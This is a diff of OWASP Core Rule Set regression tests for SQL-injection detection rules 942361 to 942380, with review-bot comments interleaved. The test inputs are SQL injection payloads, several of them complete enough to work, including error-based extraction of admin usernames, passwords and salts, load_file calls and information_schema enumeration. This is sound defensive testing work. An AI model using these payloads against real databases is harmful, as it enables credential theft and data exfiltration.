text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "'UNION A" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_title: 942361-7 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "' union/" - version: HTTP/1.0 - output: - log_contains: id "942361" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "' union/" + version: HTTP/1.0 + output: + log_contains: id "942361" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml new file mode 100644 index 0000000000..e990aff532 --- /dev/null +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml 
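Review bot: All seven 942361 cases assert `log_contains`; there is no `no_log_contains` case, so a future loosening of the rule toward false positives would pass this file unnoticed, unlike the GH-issue tests kept in the neighbouring 942360/942362 files. If the rule indeed keys on the quote or backtick prefix that all seven positives share, one benign sample without that prefix (for example `data: "the union of two sets"` with `no_log_contains: id "942361"`) would pin precision alongside recall. The User-Agent/Accept additions are otherwise applied consistently to every stage.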
@@ -0,0 +1,551 @@ +--- +meta: + author: "Christian S.J. Peron, Christoph Hansen, Franziska Buehler" + description: None + enabled: true + name: 942362.yaml +tests: + - test_title: 942362-1 + desc: "concatenated basic SQL injection and SQLLFI" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # 23423 as "sdfsdfs" FROM table + data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-2 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "select Char(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-3 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT CHAR(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-4 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT GROUP_CONCAT(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - 
test_title: 942362-5 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT group_cOnCat(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-6 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") as cc FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-7 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") AS orders FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-8 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") AS `carrier_id` from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-9 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test 
agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "select load_file(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-10 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") AS Role FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-11 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "` AS `edit_user_id` from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-12 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") AS val FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-13 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=%60+REGEXP%20" + version: HTTP/1.0 + 
output: + log_contains: id "942362" + - test_title: 942362-14 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") AS 'Durchschnitt_Importzeit' FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-15 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "` AS `OXTIMESTAMP` from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-16 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") as col_0_0_ from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-17 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") AS `count` FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-18 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 
127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") AS schlagwoerter FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-19 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") as User from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-20 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") AS t FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-21 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "(load_file(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-22 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 
+ uri: "/" + data: ") as ExecuteTheseSQLCommands FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-23 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") AS schlagwoerter FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-24 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "` AS `documentType` FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-25 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "! 
As' from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-26 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "; As not from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-27 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT load_file(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-28 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "6 As\" from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-29 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") as day1 FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-30 + desc: GH issue 1580 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: ", aside from" + version: HTTP/1.0 + output: + no_log_contains: id "942362" + - test_title: 942362-31 + desc: GH issue 1605 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "a=/create" + version: HTTP/1.0 + output: + no_log_contains: id "942362" + - test_title: 942362-32 + desc: GH issue 1605 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "a=/CREATE TABLE Persons" + version: HTTP/1.0 + output: + log_contains: id "942362" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml index 28c6d56896..b442913a28 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml 
@@ -1,23 +1,204 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 942370.yaml - tests: - - - test_title: 942370-1 - desc: "classic SQL injection probings 2/3" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "var=\"` * 12344" - version: HTTP/1.0 - output: - log_contains: id "942370" +meta: + author: "Christian S.J. Peron, Max Leske, Franziska Bühler" + description: | + classic SQL injection probings 2/3 + + WARNING: these tests were derived from the existing expressions and are semantically meaningless. + The tests were used to ensure that a change to the assembly file would not change the semantics. + If you know what a particular expression is supposed to catch, please revise the associated test. + enabled: true + name: 942370.yaml +tests: + - test_title: 942370-1 + desc: | + [\"'`]\s*?\*.+or\W*?[\"'`]\d + [\"'`]\s*?\*.+xor\W*?[\"'`]\d + [\"'`]\s*?\*.+div\W*?[\"'`]\d + [\"'`]\s*?\*.+like\W*?[\"'`]\d + [\"'`]\s*?\*.+between\W*?[\"'`]\d + [\"'`]\s*?\*.+and\W*?[\"'`]\d + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=' * from = 1 or '9" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-2 + desc: | + [\"'`]\s*?\*.+id\W*?[\"'`]\d + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=' * from = 1 id '9" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-3 + desc: | + [^\w\s?]+\s*?[^\w\s]+\s*?[\"'`"] + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: 
localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=' = # '" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-4 + desc: | + [^\w\s]+\s*?[\W\d].*?# + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=' ? # = #" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-5 + desc: | + [^\w\s]+\s*?[\W\d].*?-- + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var='? # = --" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-6 + desc: | + [\"'`]\s*?or\s[^\d]+[\w-]+.*?\d + [\"'`]\s*?xor\s[^\d]+[\w-]+.*?\d + [\"'`]\s*?div\s[^\d]+[\w-]+.*?\d + [\"'`]\s*?like\s[^\d]+[\w-]+.*?\d + [\"'`]\s*?between\s[^\d]+[\w-]+.*?\d + [\"'`]\s*?and\s[^\d]+[\w-]+.*?\d + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=' or homer 9" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-7 + desc: | + \^[\"'`] + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=^'" + version: HTTP/1.0 + output: + 
log_contains: id "942370" + - test_title: 942370-8 + desc: | + [\"'`].*?\*\s*?\d + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=\"` * 12344" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-9 + desc: | + [()\*<>%+-][\w-]+[^\w\s]+[\"'`][^,] + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=>foo##'." + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-10 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: 1"and json_search (json_array(password),0b11000010110110001101100,"t_______________")# + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-11 + desc: encode(lo_get(16400),'base64')::int + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: encode(lo_get(16400),'base64')::int + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + version: HTTP/1.0 + output: + log_contains: id "942370" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml index 90c6e0dd62..ab7974fb2c 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml 
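Review bot: 942370-10 has no `desc`, although this file's own meta description asks that each expression be documented and every other test in the hunk carries one; mirroring 942370-11, add `desc: 1"and json_search (json_array(password),0b11000010110110001101100,"t_______________")#`, or better a sentence naming what it covers (presumably a MySQL json_search() probe with a binary literal delivered via User-Agent). In 942370-3 the desc regex `[^\w\s?]+\s*?[^\w\s]+\s*?[\"'`"]` ends in a character class that lists `"` twice, which reads like a copy slip and is worth checking against the assembled expression in the rule file, since these desc lines are the only record of which alternative each test pins. Tests -10 and -11 are the only ones using GET with the payload in a header, so a short comment such as `# payload in User-Agent: exercises the REQUEST_HEADERS target` would make that intent explicit.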
@@ -1,755 +1,772 @@ --- - meta: - author: "Christoph Hansen" - description: None - enabled: true - name: 942380.yaml - tests: - - - test_title: 942380-1 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "from `db_miwf`.`sys_refindex` limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-2 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "from(select count(*),concat((select (select (select concat(0x53,0x65,0x61,0x72,0x63,0x68,0x43,0x6F,0x6C,0x6C,0x65,0x63,0x74,0x6F,0x72) from `information_schema`.tables limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-3 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "from `information_schema`.tables limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-4 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "ORder by" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-5 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "ordeR by" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-6 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-7 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 
127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=FROM+termine+GROUP+BY+tag1%26sql_delimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-8 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "SELECT 6229 FROM(SELECT COUNT(*),CONCAT(0x717a786a71,(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-9 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "SELECT CHAR(113)+CHAR(122)+CHAR(120)+CHAR(106)+CHAR(113)+(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-10 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-11 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "SELECT CONCAT(0x717a786a71,(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-12 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "SELECT (CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113))||(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-13 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "SELECT 
CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-14 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "SELECT 'qzxjq'||(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-15 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "execute php" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-16 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user desc limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-17 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "Execute(" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-18 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "from+information_schema.tables+where+BINARY+LEFT%28table_name%2C+1%29+%3D+%27nnn%27+LIMIT" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-19 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "from+information_schema.tables+where+table_schema%3Ddatabase%28%29+and+table_name+REGEXP+0x6d656d6265727324+limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 
942380-20 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "fromtype%3DvBForum%3ASocialGroupMessage%26do%3Dprocess%26contenttypeid%3D5%26categoryid%5B%5D%3D-99%29+union+select+salt+from+user+where+userid%3D1+and+row%281%2C1%29%3E%28select+count%28%2A%29%2Cconcat%28+%28select+user.salt%29+%2C0x3a%2Cfloor%28rand%280%29%2A2%29%29+x+from+%28select+1+union+select+2+union+select+3%29a+group+by+x+limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-21 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "from%2F%2A%2A%2F%28select%2F%2A%2A%2Fcount%28%2A%29%2Cconcat%28floor%28rand%280%29%2A2%29%2C0x3a%2C%28select%2F%2A%2A%2Fconcat%28user%2C0x3a%2Cpassword%29%2F%2A%2A%2Ffrom%2F%2A%2A%2Fpwn_base_admin%2F%2A%2A%2Flimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 